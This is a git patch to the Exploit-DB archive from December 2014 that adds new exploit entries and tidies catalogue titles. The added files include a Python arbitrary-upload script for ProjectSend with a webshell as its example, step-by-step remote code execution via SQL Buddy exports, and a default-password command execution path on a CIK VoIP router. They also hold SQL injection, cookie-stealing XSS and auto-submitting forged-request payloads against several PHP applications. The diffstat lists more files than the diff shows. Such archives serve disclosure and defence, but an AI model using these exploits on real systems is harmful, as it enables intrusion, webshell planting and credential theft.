From a4940a7faa006043800e54bb93b4851727b54b25 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 18 Dec 2014 04:50:37 +0000
Subject: [PATCH] Updated 12_18_2014

---
 files.csv                            |  34 +++-
 platforms/hardware/webapps/35556.txt |  56 ++++++
 platforms/linux/remote/35554.txt     |  11 ++
 platforms/php/webapps/35424.py       |  24 +++
 platforms/php/webapps/35428.txt      |  40 ++++
 platforms/php/webapps/35547.txt      |   9 +
 platforms/php/webapps/35548.txt      |  11 ++
 platforms/php/webapps/35550.txt      |  29 +++
 platforms/php/webapps/35551.txt      |  68 +++++++
 platforms/php/webapps/35555.txt      |   9 +
 platforms/php/webapps/35557.txt      |   7 +
 platforms/php/webapps/35558.txt      |   7 +
 platforms/php/webapps/35559.txt      |  13 ++
 platforms/php/webapps/35561.txt      |   9 +
 platforms/php/webapps/35562.txt      |   9 +
 platforms/unix/remote/35549.rb       | 264 +++++++++++++++++++++++++++
 platforms/windows/dos/35552.py       |  57 ++++++
 platforms/windows/dos/35553.pl       |  56 ++++++
 platforms/windows/local/35512.txt    |  47 -----
 platforms/windows/local/35534.txt    |  38 ----
 platforms/windows/local/35537.txt    |  37 ----
 platforms/windows/local/35542.txt    |  41 -----
 platforms/windows/remote/35563.pl    |  82 +++++++++
 23 files changed, 785 insertions(+), 173 deletions(-)
 create mode 100755 platforms/hardware/webapps/35556.txt
 create mode 100755 platforms/linux/remote/35554.txt
 create mode 100755 platforms/php/webapps/35424.py
 create mode 100755 platforms/php/webapps/35428.txt
 create mode 100755 platforms/php/webapps/35547.txt
 create mode 100755 platforms/php/webapps/35548.txt
 create mode 100755 platforms/php/webapps/35550.txt
 create mode 100755 platforms/php/webapps/35551.txt
 create mode 100755 platforms/php/webapps/35555.txt
 create mode 100755 platforms/php/webapps/35557.txt
 create mode 100755 platforms/php/webapps/35558.txt
 create mode 100755 platforms/php/webapps/35559.txt
 create mode 100755 platforms/php/webapps/35561.txt
 create mode 100755 platforms/php/webapps/35562.txt
 create mode 100755 platforms/unix/remote/35549.rb
 create mode 100755 platforms/windows/dos/35552.py
 create mode 100755 platforms/windows/dos/35553.pl
 delete mode 100755 platforms/windows/local/35512.txt
 delete mode 100755 platforms/windows/local/35534.txt
 delete mode 100755 platforms/windows/local/35537.txt
 delete mode 100755 platforms/windows/local/35542.txt
 create mode 100755 platforms/windows/remote/35563.pl

diff --git a/files.csv b/files.csv
index 3d6820f0f..620272643 100755
--- a/files.csv
+++ b/files.csv
@@ -12700,13 +12700,13 @@ id,file,description,date,author,platform,type,port
 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection Vulnerability",2010-07-31,gendenk,php,webapps,0
 14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass",2010-07-31,mr_me,windows,remote,0
 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
-14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
+14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0
 14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0
 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0
 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure and HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0
 14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection Vulnerability",2010-08-02,CoBRa_21,php,webapps,0
-14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0
+14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0
 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow Exploit",2010-08-02,s-dz,windows,local,0
 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability",2010-08-02,secret,php,webapps,0
 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection Vulnerability",2010-08-02,Amine_92,php,webapps,0
@@ -12747,12 +12747,12 @@ id,file,description,date,author,platform,type,port
 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0
 14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0
 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,indoushka,php,webapps,0
-14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
+14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
 14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service Vulnerability",2010-08-09,"Oh Yaw Theng",windows,dos,0
 14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x Blind SQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
 14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0
 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0
-14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
+14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
 14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
 14595,platforms/php/webapps/14595.html,"wizmall 6.4 CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0
 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
@@ -12974,7 +12974,7 @@ id,file,description,date,author,platform,type,port
 14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0
 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0
 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0
-14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0
+14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0
 14893,platforms/php/webapps/14893.txt,"php classifieds 7.3 - Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0
 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0
 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0
@@ -13004,7 +13004,7 @@ id,file,description,date,author,platform,type,port
 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0
 14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0
 14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0
-14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0
+14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0
 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0
 14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80
 14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0
@@ -31911,8 +31911,10 @@ id,file,description,date,author,platform,type,port
 35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
+35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0
 35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
+35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@@ -31988,7 +31990,6 @@ id,file,description,date,author,platform,type,port
 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0
 35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
 35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
-35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0
 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0
 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0
 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
@@ -32007,10 +32008,23 @@ id,file,description,date,author,platform,type,port
 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
-35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
-35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
-35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
 35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
 35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80
+35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 'pid' Parameter SQL Injection Vulnerability",2011-03-30,RoAd_KiLlEr,php,webapps,0
+35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0
+35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,metasploit,unix,remote,80
+35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0
+35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80
+35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0
+35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0
+35554,platforms/linux/remote/35554.txt,"Perl 5.x 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0
+35555,platforms/php/webapps/35555.txt,"AWCM 2.x 'search.php' Cross Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0
+35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0
+35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection Vulnerability",2011-04-04,KedAns-Dz,php,webapps,0
+35558,platforms/php/webapps/35558.txt,"PHP-Fusion 'articles.php' Cross Site Scripting Vulnerability",2011-04-02,KedAns-Dz,php,webapps,0
+35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0
+35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 'link' Parameter Cross Site Scripting Vulnerability",2011-04-04,"John Leitch",php,webapps,0
+35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 'ajax_action' Parameter Cross Site Scripting Vulnerability",2011-04-03,"John Leitch",php,webapps,0
+35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 'index.php' Arbitrary File Download Vulnerability",2011-04-03,KedAns-Dz,windows,remote,0
diff --git a/platforms/hardware/webapps/35556.txt b/platforms/hardware/webapps/35556.txt
new file mode 100755
index 000000000..3a0530ce6
--- /dev/null
+++ b/platforms/hardware/webapps/35556.txt
@@ -0,0 +1,56 @@
+####################################################################
+#
+# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
+# Date: 2014/12/10
+# Exploit Author: Chako
+# Vendor Homepage: https://www.ciktel.com/
+#
+####################################################################
+
+Description:
+  CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
+  and can lead to Command Execution.
+
+
+Exploit:
+
+1) Login as a normal user 
+   Default Username: User Password:cikvoip
+
+2) change URL to http://URL/adm/system_command.asp
+   and now u can run commands.
+
+
+Example:
+
+Command: ls /etc_rw/web
+
+Result:
+
+internet
+cgi-bin
+homemode_conf.asp
+menu-en.swf
+wireless
+md5.js
+hotelmode_conf.asp
+waitAndReboot.asp
+graphics
+menu.swf
+getMac.asp
+quickconfig.asp
+javascript
+firewall
+home.asp
+customermode_conf.asp
+wait.asp
+station
+login.asp
+main.css
+overview.asp
+style
+voip
+lang
+wps
+usb
+adm
diff --git a/platforms/linux/remote/35554.txt b/platforms/linux/remote/35554.txt
new file mode 100755
index 000000000..d31cef11a
--- /dev/null
+++ b/platforms/linux/remote/35554.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47124/info
+
+Perl is prone to a security-bypass weakness that occurs when laundering tainted input.
+
+Attackers can leverage this issue to bypass security checks in perl applications that rely on TAINT mode protection functionality. This opens such applications up to potential attacks that take advantage of the software's failure to properly sanitize user-supplied input. 
+
+The following example input is available:
+
+> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))'
+
+> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))' 
\ No newline at end of file
diff --git a/platforms/php/webapps/35424.py b/platforms/php/webapps/35424.py
new file mode 100755
index 000000000..7a58c08a2
--- /dev/null
+++ b/platforms/php/webapps/35424.py
@@ -0,0 +1,24 @@
+#!/usr/bin/python
+
+# Exploit Title: ProjectSend r-651 File Upload
+# Date: December 01, 2014
+# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
+# Vendor Homepage: http://www.projectsend.org/
+# Software Link: http://www.projectsend.org/download/67/
+# Version: r-561
+# Tested on: Kubuntu 14.10 x64
+
+
+import sys
+import requests
+scriptName = sys.argv[0]
+if (len(sys.argv) != 3):
+  print "Please enter the target path and the file to upload."
+  print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
+  quit()
+print "Exploiting ProjectSend-r561 File Upload .."
+url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
+print "Sending Url " + url
+files = {'file': open(sys.argv[2], 'rb')}
+r = requests.post(url, files=files)
+print r.text
\ No newline at end of file
diff --git a/platforms/php/webapps/35428.txt b/platforms/php/webapps/35428.txt
new file mode 100755
index 000000000..4a53feda2
--- /dev/null
+++ b/platforms/php/webapps/35428.txt
@@ -0,0 +1,40 @@
+# Exploit Title: SQL Buddy Remote Code Execution
+# Date: November 29 2014
+# Exploit Author: Fady Osman (@fady_osman)
+# Youtube Channel  : https://www.youtube.com/user/cutehack3r
+# Vendor Homepage: http://sqlbuddy.com/
+# Software Link:
+https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip
+# Version: SQL Buddy 1.3.3
+# Tested on: Kubuntu 14.10
+
+SQLBuddy provides a web based mysql administration and it's included in
+packages like wamp server.
+
+SQL Buddy suffers from a remote code execution. This happens due to the
+fact that it allows the user to login using any server he wants and that it
+allows the user to export data from the database to a file on the webserver.
+
+In order to exploit this bug do the following steps:
+
+1- Use a sql server you control and have a valid credentials for (You can
+use one of the free mysql hosting services).
+2- Create a database and a table with one column of type text.
+3- Insert the php code you want to execute into that table.
+4- Choose the previously created table from the left menu.
+5- Click Export from the top menu.
+6- Choose CSV format.
+7- Choose "Text File" and name the file with php extension for example
+shell.php.
+
+The exported file will be at : sqlbuddy/exports/ assuming you installed
+sqlbuddy in a folder named sqlbuddy.
+
+-- 
+
+*Regards,*
+[image: Fady Osman on about.me]
+
+Fady Osman
+about.me/Fady_Osman
+    <http://about.me/Fady_Osman>
diff --git a/platforms/php/webapps/35547.txt b/platforms/php/webapps/35547.txt
new file mode 100755
index 000000000..bf58dcd93
--- /dev/null
+++ b/platforms/php/webapps/35547.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47100/info
+
+ICJobSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ICJobSite 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/icjobsite/index.php?page=position_details&pid=[SQL-Injection] 
\ No newline at end of file
diff --git a/platforms/php/webapps/35548.txt b/platforms/php/webapps/35548.txt
new file mode 100755
index 000000000..24152b129
--- /dev/null
+++ b/platforms/php/webapps/35548.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47104/info
+
+InTerra Blog Machine is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+InTerra Blog Machine 1.84 is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/POST_URL/edit/" method="post" name="main" enctype="multipart/form-data">
+<!-- POST_URL like "2011/03/31/post_url" --> <input type="hidden" name="subject" value=&#039;post title"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="content" value=&#039;content&#039;> <input type="hidden" name="date[Date_Day]" value="31"> <input type="hidden" name="date[Date_Month]" value="03"> <input type="hidden" name="date[Date_Year]" value="2011"> <input type="hidden" name="time[Time_Hour]" value="13"> <input type="hidden" name="time[Time_Minute]" value="59"> <input type="hidden" name="comments" value="1"> <input type="hidden" name="section" value="0"> <input type="hidden" name="sectionNewName" value=""> <input type="hidden" name="sectionNewUnix" value=""> <input type="hidden" name="sectionNewHidden" value="0"> <input type="hidden" name="replicate" value="1"> <input type="hidden" name="keywords" value=""> <input type="hidden" name="edit" value="POST_ID"> </form> <script> document.main.submit(); </script>
diff --git a/platforms/php/webapps/35550.txt b/platforms/php/webapps/35550.txt
new file mode 100755
index 000000000..4e34a92a8
--- /dev/null
+++ b/platforms/php/webapps/35550.txt
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/47105/info
+
+Collabtive is prone to multiple remote input-validation vulnerabilities including cross-site scripting, HTML-injection, and directory-traversal issues.
+
+Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, and steal cookie-based authentication credentials.
+
+Collabtive 0.6.5 is vulnerable; other versions may also be affected. 
+
+Directory Traversal:
+
+http://www.example.com/thumb.php?pic=./../../../../../tmp/photo.jpg
+
+Cross-site Scripting:
+
+http://www.example.com/managetimetracker.php?action=editform&tid=1&id=1"><script>alert(document.cookie)</script>
+http://www.example.com/manageuser.php?action=profile&id=1"><script>alert(document.cookie)</script>
+
+
+HTML-injection:
+
+<form action="http://www.example.com/manageproject.php?action=edit&id=1" method="post" name="main">
+<input type="hidden" name="name" value=&#039;test"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="desc" value="Description">
+<input type="hidden" name="end" value="16.03.2011">
+</form>
+<script>
+document.main.submit();
+</script>
+
diff --git a/platforms/php/webapps/35551.txt b/platforms/php/webapps/35551.txt
new file mode 100755
index 000000000..1eab4e4c4
--- /dev/null
+++ b/platforms/php/webapps/35551.txt
@@ -0,0 +1,68 @@
+Advisory: Persistent XSS Vulnerability in CMS Papoo Light v6
+Advisory ID: SROEADV-2014-01
+Author: Steffen Rösemann
+Affected Software: CMS Papoo Version 6.0.0 Rev. 4701
+Vendor URL: http://www.papoo.de/
+Vendor Status: fixed
+CVE-ID: -
+
+==========================
+Vulnerability Description:
+==========================
+
+The CMS Papoo Light Version has a persistent XSS vulnerability in its guestbook functionality and in its user-registration functionality.
+
+==================
+Technical Details:
+==================
+
+XSS-Vulnerability #1:
+
+Papoo Light CMS v6 provides the functionality to post comments on a guestbook via the following url: http://{target-url}/guestbook.php?menuid=6.
+
+The input fields with the id „author“ is vulnerable to XSS which gets stored in the database and makes that vulnerability persistent.
+
+Payload-Examples:
+
+<img src='n' onerror=“javascript:alert('XSS')“ >
+<iframe src=“some_remote_source“></iframe>
+
+XSS-Vulnerability #2:
+
+People can register themselves on Papoo Light v6 CMS at http://{target-url}/account.php?menuid=2. Instead of using a proper username, an attacker can inject HTML and/or JavaScriptcode on the username input-field.
+
+Code gets written to the database backend then. Attacker only has to confirm his/her e-mail address to be able to login and spread the code by posting to the forum or the guestbook where the username is displayed.
+
+Payload-Examples:
+
+see above (XSS #1)
+
+=========
+Solution:
+=========
+
+Update to the latest version
+
+====================
+Disclosure Timeline:
+====================
+13-Dec-2014 – found XSS #1
+13-Dec-2014 - informed the developers (XSS #1)
+14-Dec-2014 – found XSS #2
+14-Dec-2014 – informed the developers (XSS #2)
+15-Dec-2014 - release date of this security advisory
+15-Dec-2014 - response and fix by vendor
+15-Dec-2014 - post on BugTraq
+
+========
+Credits:
+========
+
+Vulnerability found and advisory written by Steffen Rösemann.
+
+===========
+References:
+===========
+
+http://www.papoo.de/
+http://sroesemann.blogspot.de
\ No newline at end of file
diff --git a/platforms/php/webapps/35555.txt b/platforms/php/webapps/35555.txt
new file mode 100755
index 000000000..feb9e697d
--- /dev/null
+++ b/platforms/php/webapps/35555.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47126/info
+
+AWCM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+AWCM 2.2 and prior versions are vulnerable.
+
+http://www.example.com/awcm/search.php?search=<script>alert("SecPod-XSS-Test")</script>&where=all 
\ No newline at end of file
diff --git a/platforms/php/webapps/35557.txt b/platforms/php/webapps/35557.txt
new file mode 100755
index 000000000..6a56d348b
--- /dev/null
+++ b/platforms/php/webapps/35557.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47128/info
+
+PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/[Path]/articles.php?article_id=-1+union+select+version()-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/35558.txt b/platforms/php/webapps/35558.txt
new file mode 100755
index 000000000..94c6d065d
--- /dev/null
+++ b/platforms/php/webapps/35558.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47130/info
+
+PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[Path]/articles.php?article_id="><script>alert(document.cookie);</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/35559.txt b/platforms/php/webapps/35559.txt
new file mode 100755
index 000000000..0a6018e4e
--- /dev/null
+++ b/platforms/php/webapps/35559.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47131/info
+
+MyBB is prone to multiple security vulnerabilities. These vulnerabilities include a username-enumeration weakness, an XML-injection vulnerability, and a cross-site scripting vulnerability.
+
+Exploiting these issues may allow attackers to discern valid usernames, which may aid them in brute-force password cracking or other attacks. Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
+
+Versions prior to 1.6.2 and 1.4.15 are vulnerable. 
+
+XML-injection:
+http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cxml/%3E
+
+XSS:
+http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/35561.txt b/platforms/php/webapps/35561.txt
new file mode 100755
index 000000000..785338427
--- /dev/null
+++ b/platforms/php/webapps/35561.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47141/info
+
+The WPwizz AdWizz plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+AdWizz plugin 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{// 
